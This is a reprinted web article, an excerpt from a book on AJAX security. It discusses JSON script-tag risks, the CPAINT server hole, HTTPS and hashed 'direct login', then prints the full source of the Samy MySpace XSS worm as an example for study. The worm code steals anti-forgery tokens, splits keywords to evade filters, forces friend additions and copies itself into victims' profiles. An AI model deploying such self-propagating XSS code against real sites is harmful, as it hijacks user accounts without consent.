Welcome!

Industrial IoT Authors: Pat Romanski, William Schmarzo, Elizabeth White, Stackify Blog, Yeshim Deniz

Related Topics: Industrial IoT, Machine Learning

Industrial IoT: Article

JSON - An Attempt to Bring XSS Back

JSON lets one take advantage of the 'On Demand Javascript/Script Tag hack' described earlier

This content is reprinted from Real-World AJAX: Secrets of the Masters published by SYS-CON Books. To order the entire book now along with companion DVDs for the special pre-order price, click here for more information. Aimed at everyone from enterprise developers to self-taught scripters, Real-World AJAX: Secrets of the Masters is the perfect book for anyone who wants to start developing AJAX applications.

JSON - An Attempt to Bring XSS Back
JSON lets one take advantage of the "On Demand Javascript/Script Tag hack" described earlier. This technique allows new HTML script tags to be dynamically generated and the "script" to be downloaded from any server.

When the downloaded script is made up of data formatted in JSON, the script tag is effectively being used to download new data across domains outside of the same-origin policy.

But if you're going to employ JSON techniques to create an application, great care must be taken to close potential security holes. And, in this case, you'd be depending on all JavaScript coming from third-party sources to cooperate with your application and your intentions. In other words, generally speaking, this technique opens up your application to whatever JavaScript is supplied by the servers you're making requests from. For this reason, this technique may be better suited to more controlled environments than the public Web.

Other parts of this book will discuss JSON in detail. What's important to note here is that JSON is a good example of how developers will continue to build paths to external data even when some security may be built in to prohibit it.

When this happens, your own security efforts and understanding of the risks becomes more important in the design and maintenance of your Web application.

The CPAINT Hole
CPAINT, the cross-platform Asynchronous Internet Toolkit, is a common set of tools used by many sites to implement AJAX. In October 2005, a hole was found in servers running CPAINT that allowed the execution of malicious code on a server using CPAINT.

When the hole was noticed, the CPAINT community rapidly identified a solution and released a patch to close it. Hence, CPAINT was more of a hole in a tool than a risk for AJAX, but the hole itself is an AJAX issue.

CPAINT examines requests to parse out malicious code. However, like Samy's MySpace worm code, malicious code could be introduced to the server by providing it in fragments the CPAINT parser would allow and concatenate into executable script.

CPAINT also included elements that allowed malicious code to fish for and execute serverside code.

In both of these instances, validating the request and properly screening for malicious code quickly sealed the security holes. Get info at www.techworld.com/security/news/index.cfm?NewsID=4245

Good Old Network Security
General network security remains important in AJAX applications, since we've seen that the serverside risks can increase with AJAX. A few simple network security practices can go a long way to increasing the security of your server.

Securing the conversation between the browser and the server is key to securing AJAX servers. As mentioned above, unverified XMLHttpRequests can steal information or release malicious code. Maintaining strict control over requests is therefore an important consideration in AJAX application design.

HTTPS
HTTPS is standard secure HTTP. HTTPS sessions typically use a different port than unsecured HTTP (HTTPS uses port 443, HTTP uses port 80). Transactions over HTTPS are encrypted via SSL. An encrypted connection over HTTPS can aid in securing session and request validation by hiding the contents of specific requests, including session identifiers, from eavesdroppers.

Typically, because HTTP is a stateless protocol, state is maintained between the browser and a server by passing a session ID back and forth. This ID can be stored in a cookie on the browser (whose cookie data is then sent back to the originating server), embedded in request URLs, or embedded in some part of the Web page that communicates with the server.

This last case is particularly viable with AJAX. For example, in response to an AJAX request, a server can include a short-lived session ID. The server can then validate subsequent requests from the browser based on that ID.

A malicious user or application could try to capture that ID and then reuse it to impersonate the user/application that initiated the session. To the degree that the browser prevents cross-site scripting attacks, this ID is safe in the browser context.

But, "on the wire," using HTTP, the value of this ID would be exposed as plain text. And, if the session ID persisted for a long time, there would be a bigger window of opportunity to hijack the session.

Fortunately, by encrypting the connection between the browser and server, HTTPS never exposes the request or response contents as plain text. So session IDs aren't exposed "on the wire."

Encryption

  • The Hash: Many secure transactions on the Web take place using a cryptographic tool called a hash. A hash is a derived value that approximates randomness as much as possible but retains coherence and verifiability. A server will supply a given session with a unique hash that can accompany the URI, track the session, and validate requests. The hash itself isn't used to log into a session, merely to track one. Therefore, if a hash is intercepted, it can't be used by an outside entity.
  • Direct Login: Another interesting security-related feature that makes use of AJAX is a technique known as "direct login." Direct login directly submits login information using an XML HttpRequest rather than using a single full-page post of an HTML form.
Direct login, in some sense, is actually less direct: several steps are involved that can provide added security. But, from the user's perspective, the login is "direct" because his login is occurring without reloading the page.

Because the direct login process uses JavaScript, it can take advantage of JavaScript's ability to calculate hashes and then transmit only hashed credentials, rather than plain text, to the server.

Direct login can work hand-in-hand with HTTPS. But sometimes HTTPS is unavailable or undesirable, due to the performance overhead associated with encrypting all of the browser-server conversation.

Figure 8.1 shows how direct login works. A user already has an account on the server. When the user approaches the site, the server creates a unique one-time session seed. The server provides the session seed to the browser, which asks the user for a user name and password/passphrase. If the password (stored locally) is valid, the browser then creates an attempted hash (it assumes the hash is on the server) based on the user's unique ID. The system then hashes that again (double hashing) with the session seed.

This creates a very secure hash to provide the server. The browser then feeds the server the double hash, the user name, and the session seed.

The server then takes the seed and user name and verifies them. It then computes the stored hash for that user, combines it with the seed, and creates its own server-side double hash. That double hash is then compared to the one sent with the browser.

If they match, the user can access the system. If they don't, the server can generate a second seed and rechallenge the browser.

In this system, the actual user password is never transmitted. Only the double hash and the user ID are transmitted. Computation on both sides is necessary to create the unique session double hash.

  • Host-Proof Hosting: Host-proof hosting is still more of a theory than an actual technique. First raised by Richard Schwartz, host-proof hosting encrypts most information traveling through a server to protect both the host and the client from data theft or other intrusions.
Exploit with Care
Users don't know what you are doing to them. Your AJAX code may work miracles, but may leave their comfort zone, which the more savvy will immediately bring to your attention (and through their blogs, everyone else's).

AJAX applications by design shuffle data around. If you're gathering information about their visit or supplying data to them from a variety of sources - let the users know. You may feel your application is completely innocent, but others may feel differently.

Also, without that information, others may grow not to trust your application if they feel their information is in some way being used without their consent.

Last, as technologies come and go, good and bad exploits are going to come and go with them. Disclosure will keep you safe.

Conclusion: I Must Exploit: I Must Not Be Exploited
Exploits are what drive AJAX development. AJAX is all about pushing the browser to its limits. How close can it get to desktop app complexity? How much data can we combine and analyze on one elegant Web page? How many independent data requests can feed one session?

But even as we exploit, we don't want to be exploited. XSS, JSON, and other future flavors of AJAX all bring previously unseen power to browser-based apps. But they bring the danger of malicious scripting with them. Since AJAX is, and for its lifetime will be, a work-in-progress, google AJAX Security often.

Full Code Example: The Samy MySpace Virus
Examining the Samy virus shows that while it's technically easy to use some of these exploits, it's still a bit of work.

  // get quotes string
  var B=String.fromCharCode(34);
  var A=String.fromCharCode(39);

  function g()
  {
    var C;
    try
    {
      var D=document.body.createTextRange();
      C=D.htmlText
    }
    catch(e)
    {
    }
      if(C)
    { return C
    }
    else
    {
    return eval('document.body.inne'+'rHTML')
    }
  }

  function getData(AU)
  {
    M=getFromURL(AU,'friendID');
    L=getFromURL(AU,'Mytoken')
  }

  function getQueryParams()
  {
    var E=document.location.search;
    var F=E.substring(1,E.length).split('&');
    var AS=new Array();
    for(var O=0;O
    {
      var I=F[O].split('=');
      AS[I[0]]=I[1]
    }
    return AS
  }

  var J;
  var AS=getQueryParams();
  var L=AS['Mytoken'];
  var M=AS['friendID'];

  if(location.hostname=='profile.myspace.com')
  {
    document.location='http://www.myspace.com'+
location.pathname+location.search
  }
  else
  {
    if(!M)
    {
      getData(g())
    }
    main()
  }

  function getClientFID()
  {
    return findIn(g(),'up_launchIC( '+A,A)
  }

  function nothing()
  {
  }

  function paramsToString(AV)
  {
    var N=new String();
    var O=0;
    for(var P in AV)
    {
      if(O>0)
      {
      N+='&'
      }
      var Q=escape(AV[P]);
          while(Q.indexOf('+')!=-1)
      {
        Q=Q.replace('+','%2B')
      }
          while(Q.indexOf('&')!=-1)
      {
        Q=Q.replace('&','%26')
      }

      N+=P+'='+Q;
      O++
    }
    return N
  }

  function httpSend(BH,BI,BJ,BK)
  {
    if(!J)
    {
      return false
    }
    eval('J.onr'+'eadystatechange=BI');
    J.open(BJ,BH,true);
    if(BJ=='POST')
    {
      J.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
      J.setRequestHeader('Content-Length',BK.length)
    }
     J.send(BK);
     return true
  }

  function findIn(BF,BB,BC)
  {
    var R=BF.indexOf(BB)+BB.length;
    var S=BF.substring(R,R+1024);
    return S.substring(0,S.indexOf(BC))
  }

  function getHiddenParameter(BF,BG)
  {
    return findIn(BF,'name='+B+BG+B+' value='+B,B)
  }

  function getFromURL(BF,BG)
  {
    var T;
    if(BG=='Mytoken')
    {
      T=B
    }
     else
    {
      T='&'
    }
    var U=BG+'=';
    var V=BF.indexOf(U)+U.length;
    var W=BF.substring(V,V+1024);
    var X=W.indexOf(T);
    var Y=W.substring(0,X);
    return Y
  }

  function getXMLObj()
  {
    var Z=false;
    if(window.XMLHttpRequest)
    {
      try
      {
        Z=new XMLHttpRequest()
      }
      catch(e)
      {
        Z=false
      }
    }
    else if(window.ActiveXObject)
    {
      try
      {
        Z=new ActiveXObject('Msxml2.XMLHTTP')
      }
      catch(e)
      {
        try
        {
          Z=new ActiveXObject('Microsoft.XMLHTTP')
        }
        catch(e)
        {
          Z=false
        }
      }
    }
    return Z
  }

  var AA=g();
  var AB=AA.indexOf('m'+'ycode');
  var AC=AA.substring(AB,AB+4096);
  var AD=AC.indexOf('D'+'IV');
  var AE=AC.substring(0,AD);
  var AF;

  if(AE)
  {
    AE=AE.replace('jav'+'a',A+'jav'+'a');
    AE=AE.replace('exp'+'r)','exp'+'r)'+A);
    AF=' but most of all, samy is my hero. '
  }

  var AG;

  function getHome()
  {
    if(J.readyState!=4)
    {
    return
  }

    var AU=J.responseText;
    AG=findIn(AU,'P'+'rofileHeroes','');
    AG=AG.substring(61,AG.length);
    if(AG.indexOf('samy')==-1)
    {
      if(AF)
      {
        AG+=AF;
      var AR=getFromURL(AU,'Mytoken');
      var AS=new Array();
      AS['interestLabel']='heroes';
      AS['submit']='Preview';
      AS['interest']=AG;
      J=getXMLObj();
        httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken=
  '+AR,postHero,'POST',paramsToString(AS))
      }
    }
  }

  function postHero()
  {
    if(J.readyState!=4)
    {
      return
  }

      var AU=J.responseText;
      var AR=getFromURL(AU,'Mytoken');
      var AS=new Array();
      AS['interestLabel']='heroes';
      AS['submit']='Submit';
      AS['interest']=AG;
      AS['hash']=getHiddenParameter(AU,'hash');
      httpSend('/index.cfm?fuseaction=profile.processInterests&
Mytoken='+AR,nothing,'P
  OST',paramsToString(AS))
  }

  function main()
  {
      var AN=getClientFID();
      var BH='/index.cfm?fuseaction=user.viewProfile&friendID=
'+AN+'&Mytoken='+L;
      J=getXMLObj();
      httpSend(BH,getHome,'GET');
      xmlhttp2=getXMLObj();
      httpSend2('/index.cfm?fuseaction=invite.addfriend_
verify&friendID=11851658&Myto
  ken='+L,processxForm,'GET')
  }

  function processxForm()
  {
    if(xmlhttp2.readyState!=4)
    {
      return
  }

    var AU=xmlhttp2.responseText;
    var AQ=getHiddenParameter(AU,'hashcode');
    var AR=getFromURL(AU,'Mytoken');
    var AS=new Array();
    AS['hashcode']=AQ;
    AS['friendID']='11851658';
    AS['submit']='Add to Friends';
    httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&
Mytoken='+AR,nothing,
  'POST',paramsToString(AS))
  }

  function httpSend2(BH,BI,BJ,BK)
  {
    if(!xmlhttp2)
    {
      return false
    }

    eval('xmlhttp2.onr'+'eadystatechange=BI');
    xmlhttp2.open(BJ,BH,true);

    if(BJ=='POST')
    {
      xmlhttp2.setRequestHeader('Content-Type','application/
x-www-form-urlencoded');
      xmlhttp2.setRequestHeader('Content-Length',BK.length)
    }

    xmlhttp2.send(BK);
    return true
  }

This content is reprinted from Real-World AJAX: Secrets of the Masters published by SYS-CON Books. To order the entire book now along with companion DVDs, click here to order.

More Stories By James Benson

Jim Benson, AICP, is the COO of Gray Hill Solutions in Seattle. Gray Hill creates tools for government and industry to harness and utilize real-time data. Jim has always driven applications for his clients to store and provide information in easily extensible ways. Web 2.0 has therefore been a natural environment for him. He is also involved with the Cooperation Commons and the Institute for the Future's Future Commons to study human cooperation and envision the future of cooperation. Jim's tags: Gray Hill Solutions (www.grayhillsolutions.com), Jim's Blog (http://ourfounder.typepad.com), Cooperation Commons (www.cooperationcommons.org), Institute for the Future (www.iftf.org).

More Stories By Jay Fienberg

Jay Fienberg is co-founder of Juxtaprose where he designs information architecture and user experience for websites and information systems.

He specializes in design for content and information-rich websites and web-based social and collaboration systems. His current preferred CMS is ExpressionEngine, though he also works with Wordpress and Joomla, and still gets called upon to make SharePoint do interesting CMS-like things for enterprise intranets.

Since the early 1990s, Jay also has designed and developed hypertext, database, and content management systems and worked in a wide range of programming languages including XML, SQL, SGML, Python, PHP, Javascript, Java, HTML, CSS and APL.

For anything more official, please visit jayfienberg.com.

Comments (0)

Share your thoughts on this story.

Add your comment
You must be signed in to add a comment. Sign-in | Register

In accordance with our Comment Policy, we encourage comments that are on topic, relevant and to-the-point. We will remove comments that include profanity, personal attacks, racial slurs, threats of violence, or other inappropriate material that violates our Terms and Conditions, and will block users who make repeated violations. We ask all readers to expect diversity of opinion and to treat one another with dignity and respect.


IoT & Smart Cities Stories
There are many examples of disruption in consumer space – Uber disrupting the cab industry, Airbnb disrupting the hospitality industry and so on; but have you wondered who is disrupting support and operations? AISERA helps make businesses and customers successful by offering consumer-like user experience for support and operations. We have built the world’s first AI-driven IT / HR / Cloud / Customer Support and Operations solution.
Codete accelerates their clients growth through technological expertise and experience. Codite team works with organizations to meet the challenges that digitalization presents. Their clients include digital start-ups as well as established enterprises in the IT industry. To stay competitive in a highly innovative IT industry, strong R&D departments and bold spin-off initiatives is a must. Codete Data Science and Software Architects teams help corporate clients to stay up to date with the mod...
At CloudEXPO Silicon Valley, June 24-26, 2019, Digital Transformation (DX) is a major focus with expanded DevOpsSUMMIT and FinTechEXPO programs within the DXWorldEXPO agenda. Successful transformation requires a laser focus on being data-driven and on using all the tools available that enable transformation if they plan to survive over the long term. A total of 88% of Fortune 500 companies from a generation ago are now out of business. Only 12% still survive. Similar percentages are found throug...
Druva is the global leader in Cloud Data Protection and Management, delivering the industry's first data management-as-a-service solution that aggregates data from endpoints, servers and cloud applications and leverages the public cloud to offer a single pane of glass to enable data protection, governance and intelligence-dramatically increasing the availability and visibility of business critical information, while reducing the risk, cost and complexity of managing and protecting it. Druva's...
BMC has unmatched experience in IT management, supporting 92 of the Forbes Global 100, and earning recognition as an ITSM Gartner Magic Quadrant Leader for five years running. Our solutions offer speed, agility, and efficiency to tackle business challenges in the areas of service management, automation, operations, and the mainframe.
The Jevons Paradox suggests that when technological advances increase efficiency of a resource, it results in an overall increase in consumption. Writing on the increased use of coal as a result of technological improvements, 19th-century economist William Stanley Jevons found that these improvements led to the development of new ways to utilize coal. In his session at 19th Cloud Expo, Mark Thiele, Chief Strategy Officer for Apcera, compared the Jevons Paradox to modern-day enterprise IT, examin...
With 10 simultaneous tracks, keynotes, general sessions and targeted breakout classes, @CloudEXPO and DXWorldEXPO are two of the most important technology events of the year. Since its launch over eight years ago, @CloudEXPO and DXWorldEXPO have presented a rock star faculty as well as showcased hundreds of sponsors and exhibitors! In this blog post, we provide 7 tips on how, as part of our world-class faculty, you can deliver one of the most popular sessions at our events. But before reading...
DSR is a supplier of project management, consultancy services and IT solutions that increase effectiveness of a company's operations in the production sector. The company combines in-depth knowledge of international companies with expert knowledge utilising IT tools that support manufacturing and distribution processes. DSR ensures optimization and integration of internal processes which is necessary for companies to grow rapidly. The rapid growth is possible thanks, to specialized services an...
At CloudEXPO Silicon Valley, June 24-26, 2019, Digital Transformation (DX) is a major focus with expanded DevOpsSUMMIT and FinTechEXPO programs within the DXWorldEXPO agenda. Successful transformation requires a laser focus on being data-driven and on using all the tools available that enable transformation if they plan to survive over the long term. A total of 88% of Fortune 500 companies from a generation ago are now out of business. Only 12% still survive. Similar percentages are found throug...
Scala Hosting is trusted by 50 000 customers from 120 countries and hosting 700 000+ websites. The company has local presence in the United States and Europe and runs an internal R&D department which focuses on changing the status quo in the web hosting industry. Imagine every website owner running their online business on a fully managed cloud VPS platform at an affordable price that's very close to the price of shared hosting. The efforts of the R&D department in the last 3 years made that pos...